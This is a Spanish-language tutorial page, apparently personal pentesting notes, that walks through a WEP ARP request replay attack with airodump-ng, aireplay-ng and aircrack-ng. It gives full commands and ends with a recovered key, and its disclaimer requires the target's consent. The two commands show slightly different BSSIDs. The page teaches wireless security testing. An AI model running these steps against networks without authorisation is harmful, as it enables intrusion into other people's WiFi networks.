🌐ARP Request Replay
Quedamos a la espera de un paquete ARP y luego lo retransmite al AP y así el AP retransmite el paquete ARP generando múltiples IVs
Disclaimer: Vamos a realizar ataques a redes WiFi, por lo que no podemos utilizar estas técnicas sin un consentimiento o aprobación por parte del objetivo
1. Partimos de un Fake Auth
🌐Fake Autentication2. Iniciar airodump-ng
Debemos guardar la salida con --write
# 4 - Iniciamos airodump-ng y guardamos la salida
sudo airodump-ng --bssid 00:E0:4C:6A:5A:F8 --channel 11 --write arp_rr wlan0

Importante: mantener abierto mientras se ejecuta aireplay-ng
3. aireplay --arpreplay
sudo aireplay-ng --help
Attack modes (numbers can still be used):
--deauth count : deauthenticate 1 or all stations (-0)
--fakeauth delay : fake authentication with AP (-1)
--interactive : interactive frame selection (-2)
>> --arpreplay : standard ARP-request replay (-3)
--chopchop : decrypt/chopchop WEP packet (-4)
--fragment : generates valid keystream (-5)
--caffe-latte : query a client for new IVs (-6)
--cfrag : fragments against a client (-7)
--migmode : attacks WPA migration mode (-8)
--test : tests injection and quality (-9)
sudo aireplay-ng --arpreplay -b <SSID-OBJETIVO> -h <MAC-ADAPTADOR> <INTERFAZ>
sudo aireplay-ng --arpreplay -b 00:E0:AC:6A:5A:F8 -h E8:4E:06:35:A9:C0 wlan0mon

Volviendo a airodump vemos que hemos aumentado correctamente el tráfico de red

4. Iniciar aircrack-ng
Abrir el archivo .cap
sudo aircrack-ng arp_rr.cap

KEY FOUND! [12:34:56:78:90]
Password: 1234567890
Última actualización
¿Te fue útil?